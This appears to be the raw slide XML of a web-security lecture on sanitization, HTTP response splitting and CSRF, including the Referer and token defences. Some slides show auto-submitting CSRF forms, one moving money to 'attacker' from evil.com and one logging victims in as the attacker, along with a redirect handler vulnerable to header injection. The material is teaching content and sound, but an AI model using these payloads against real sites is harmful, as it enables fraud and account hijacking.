          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think of this as sandboxing user-controlled data that is interpolated into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Must be implemented server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You as a web developer have no guarantees about what happens client-side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two main classes of approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output sanitization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Validation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request.args.get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msg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if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is_valid_base64(x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>): abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500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 is to check that application inputs are "valid"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request parameters, header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data, posted data, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assumption is that well-formed data should also not contain attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also relatively easy to identify all inputs to validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, it's difficult to ensure that valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much can happen between input validation checks and document interpolation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Sanitization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&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"content"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{{sanitize(data)}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Another approach is to sanitize untrusted data during </a:t>
            </a:r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Remove or encode special characters like ‘&lt;‘ and ‘&gt;’, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to achieve a strong guarantee that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can't be injected into a document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, it can be difficult to specify the sanitization policy (coverage, exceptions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must take interpolation context into account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CDATA, attributes, JavaScript, CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nesting!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires a robust browser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Challenges of Sanitizing Data</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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&lt;div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id=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"content"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&lt;h1&gt;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User Info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&lt;/h1&gt;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&lt;p&gt;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Hi {{user.name}}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&lt;/p&gt;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&lt;p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id=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"status"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style=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"{{</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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user.style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}}"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&gt;&lt;/p&gt;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&lt;/div&gt;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&lt;script&gt;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$.get(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'/user/status/{{user.id}}'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function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(data)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    $(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'#status'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).html(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'You are now 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data.status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});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&lt;/script&gt;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242392" y="1559866"/>
            <a:ext cx="2477386" cy="531517"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68472"/>
              <a:gd name="adj2" fmla="val 120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HTML Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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925340" y="2091383"/>
            <a:ext cx="2558901" cy="531517"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108361"/>
              <a:gd name="adj2" fmla="val 7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Attribute Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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014483" y="3467719"/>
            <a:ext cx="2558901" cy="531517"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108361"/>
              <a:gd name="adj2" fmla="val 7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Script Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangular Callout 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301562" y="5271337"/>
            <a:ext cx="2594344" cy="739986"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42787"/>
              <a:gd name="adj2" fmla="val -93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Was this sanitized by the server?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5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Splitting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4994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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>app.route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'/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oldurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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</a:rPr>
              <a:t>def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/>
              <a:t>do_redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>():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# ...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url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>request.args.get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'u'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''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resp.headers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'Location'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url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resp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300" dirty="0"/>
              <a:t>Response splitting is an attack against the integrity of responses issued by a server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>Similar to, but not the same, as XSS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Simplest example is redirect splitting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>Apps vulnerable when they don't filter delimiters from untrusted inputs that appear in Location headers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Example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973" y="2040292"/>
            <a:ext cx="9856051" cy="4528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52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Splitting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4245" y="148026"/>
            <a:ext cx="3738465" cy="266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@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>app.route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'/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oldurl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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def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/>
              <a:t>do_redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>():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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ...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url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>request.args.get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'u'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''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resp.headers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'Location'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>url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chemeClr val="accent6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resp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41" y="2810361"/>
            <a:ext cx="10110151" cy="39425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ular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9343342" y="3237263"/>
            <a:ext cx="2525197" cy="1173006"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33084"/>
              <a:gd name="adj2" fmla="val -142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Moral of this story: always sanitize data from the user!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9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66953"/>
            <a:ext cx="6674168" cy="6309266"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="548640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1992: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51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 (CSRF)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CSRF is another of the basic web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Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tricks victim into accessing URL that performs an unauthorized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Avoids the need to read private state (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>.cookie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Abuses the SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All requests to origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>D*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’s cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… even if some other origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sends the request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>D*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Website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2824" y="2313992"/>
            <a:ext cx="10493829" cy="4086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012" y="2444620"/>
            <a:ext cx="28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Bank of Washington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190">
            <a:off x="3790170" y="2479459"/>
            <a:ext cx="713405" cy="3831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58335" y="2477076"/>
            <a:ext cx="2438400" cy="377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867053" y="2477076"/>
            <a:ext cx="329682" cy="37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41919"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1776626" y="3217740"/>
          <a:ext cx="8776044" cy="492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674"/>
                <a:gridCol w="1462674"/>
                <a:gridCol w="1462674"/>
                <a:gridCol w="1462674"/>
                <a:gridCol w="1462674"/>
                <a:gridCol w="1462674"/>
              </a:tblGrid>
              <a:tr h="4921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Account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Transfer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Invest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Learn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Contact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5195" y="2477076"/>
            <a:ext cx="202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Welcome, Christo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751438" y="4110681"/>
            <a:ext cx="6936259" cy="2100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/>
              <a:t>Transfer Money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50361" y="4819908"/>
            <a:ext cx="144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To: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0361" y="5443212"/>
            <a:ext cx="144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Amount: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6158" y="484334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36157" y="549128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31113" y="5457457"/>
            <a:ext cx="1494160" cy="48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Transfer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07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342" y="421423"/>
            <a:ext cx="2094335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Side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2589" y="418267"/>
            <a:ext cx="2094335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29231" y="918706"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="38170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812374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GET /login_form.html HTTP/1.1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231" y="1424118"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="38681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HTTP/1.1 200 OK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9231" y="2502116"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="38170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812375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45356" y="3387776"/>
              <a:ext cx="2673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POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>login.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t> HTTP/1.1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80546" y="3034093"/>
            <a:ext cx="5299400" cy="684420"/>
            <a:chOff x="3732252" y="3340286"/>
            <a:chExt cx="5299400" cy="37324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732253" y="3713535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32252" y="3340286"/>
              <a:ext cx="5299400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HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>Set-Cookie: session=3#4fH8d%dA1; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>HttpOnly</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>; Secure;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9991" y="4053512"/>
            <a:ext cx="5250715" cy="646332"/>
            <a:chOff x="3812377" y="3469443"/>
            <a:chExt cx="5250715" cy="27922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812377" y="3745696"/>
              <a:ext cx="5250715" cy="297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2709" y="3469443"/>
              <a:ext cx="3278463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GET /money_xfer.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>Cookie: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>session=3#4fH8d%dA1;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" y="144897"/>
            <a:ext cx="1005227" cy="100522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445648" y="4817103"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817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HTTP/1.1 200 OK</a:t>
              </a:r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7724" y="5516677"/>
            <a:ext cx="5250715" cy="666960"/>
            <a:chOff x="3820299" y="3219826"/>
            <a:chExt cx="5250715" cy="66696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820299" y="3862997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90800" y="3219826"/>
              <a:ext cx="3182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POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>xfer.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t> HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=3#4fH8d%dA1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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4697" y="6303673"/>
            <a:ext cx="5291475" cy="369331"/>
            <a:chOff x="3715834" y="3387776"/>
            <a:chExt cx="5291475" cy="201415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3715834" y="3589191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320571" y="3387776"/>
              <a:ext cx="2122761" cy="20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HTTP/1.1 302 Found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68" y="256678"/>
            <a:ext cx="893446" cy="893446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>
            <a:off x="2926702" y="2672709"/>
            <a:ext cx="329682" cy="110307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2926702" y="1135236"/>
            <a:ext cx="329682" cy="110723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2926702" y="5502149"/>
            <a:ext cx="329682" cy="121587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2926702" y="4206027"/>
            <a:ext cx="329682" cy="104033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2175" y="1334909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GET the login page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22175" y="2562528"/>
            <a:ext cx="2516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dirty="0" smtClean="0"/>
              <a:t>POST username and password, receive a session cookie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22174" y="4376678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000" dirty="0" smtClean="0"/>
              <a:t>GET the money transfer page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22173" y="5756142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000" dirty="0" smtClean="0"/>
              <a:t>POST the money transfer request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4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71"/>
            <a:ext cx="10515600" cy="1154858"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF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31" y="1243316"/>
            <a:ext cx="10506269" cy="609840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assume that the victim is logged-in to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.bofw.com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73" y="483914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8952" y="5926895"/>
            <a:ext cx="2568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Origin: www.bofw.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>session=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>3#4fH8d%dA1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09639" y="4643941"/>
            <a:ext cx="1377448" cy="1507199"/>
            <a:chOff x="7769737" y="2349795"/>
            <a:chExt cx="1377448" cy="1507199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7769737" y="3456884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evil.com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68" y="2549659"/>
              <a:ext cx="893446" cy="8934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303" y="2349795"/>
              <a:ext cx="641882" cy="64188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5" y="4719161"/>
            <a:ext cx="1245186" cy="12451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7555" y="1889368"/>
            <a:ext cx="2476716" cy="1746002"/>
            <a:chOff x="8632045" y="2688229"/>
            <a:chExt cx="2476716" cy="17460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550" y="3094062"/>
              <a:ext cx="893446" cy="8934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32045" y="4034121"/>
              <a:ext cx="1210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bofw.com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07906" y="2688229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Bank of Washington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838137" y="3059225"/>
              <a:ext cx="440390" cy="236506"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6825743" y="1931043"/>
            <a:ext cx="5124517" cy="2392961"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27499"/>
              <a:gd name="adj2" fmla="val 657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"https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://bofw.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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b="1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to“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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"attacker"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amount“</a:t>
            </a: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"1000000"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.forms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].submit();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13191" y="4991997"/>
            <a:ext cx="2545470" cy="405544"/>
            <a:chOff x="1413191" y="4991997"/>
            <a:chExt cx="2545470" cy="40554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413191" y="5397541"/>
              <a:ext cx="25454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10028" y="4991997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Send malicious link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05339" y="4717419"/>
            <a:ext cx="2341240" cy="396999"/>
            <a:chOff x="5105339" y="4717419"/>
            <a:chExt cx="2341240" cy="396999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105339" y="5114417"/>
              <a:ext cx="2341240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78252" y="4717419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) GET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63700" y="5407703"/>
            <a:ext cx="2382880" cy="374818"/>
            <a:chOff x="5063700" y="5539083"/>
            <a:chExt cx="2382880" cy="374818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5063700" y="5539083"/>
              <a:ext cx="2382880" cy="134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8824" y="5544569"/>
              <a:ext cx="201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3) HTTP/1.1 200 OK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01852" y="3120666"/>
            <a:ext cx="2265349" cy="1688143"/>
            <a:chOff x="2101852" y="3120666"/>
            <a:chExt cx="2265349" cy="1688143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128015" y="3120666"/>
              <a:ext cx="2239186" cy="16881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218948">
              <a:off x="2101852" y="4014345"/>
              <a:ext cx="2201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) POST, session=3#...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86524" y="2889202"/>
            <a:ext cx="2476934" cy="1800033"/>
            <a:chOff x="2286524" y="2889202"/>
            <a:chExt cx="2476934" cy="180003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286524" y="2889202"/>
              <a:ext cx="2447913" cy="18000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2196168">
              <a:off x="2431729" y="3417097"/>
              <a:ext cx="233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5) HTTP/1.1 302 Found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4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CSRF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&lt;form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action=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"https://victim-app.io/login"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&lt;input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name=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"user"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value=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"attacker"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&lt;input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name=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"password"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value=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"blah23"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&lt;/form&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327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.forms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[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0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].submit();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&lt;/script&gt;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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF is a special form of the more general case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF on a login form to log victim in as the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can later see what the victim did in the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Search history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Items viewed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CSRF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main types of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err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leverages the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTTP header, which is automatically added to all requests by the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Imperfect solution, may lead to false positives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CSRF tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Random tokens inserted into all forms by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> responses must include the corresponding random token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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”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66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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sent automatically by the browser to indicate the origin of a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Example: if you click a link from Google Search…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer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https://google.com/search?q=whatever</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>possibilities in the previous CSRF example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://www.bofw.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://evil.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer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Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to mitigate CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strict: only accept POST if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is present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smtClean="0"/>
              <a:t>expected value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lenient: only accept POST if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is absent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> expected 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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
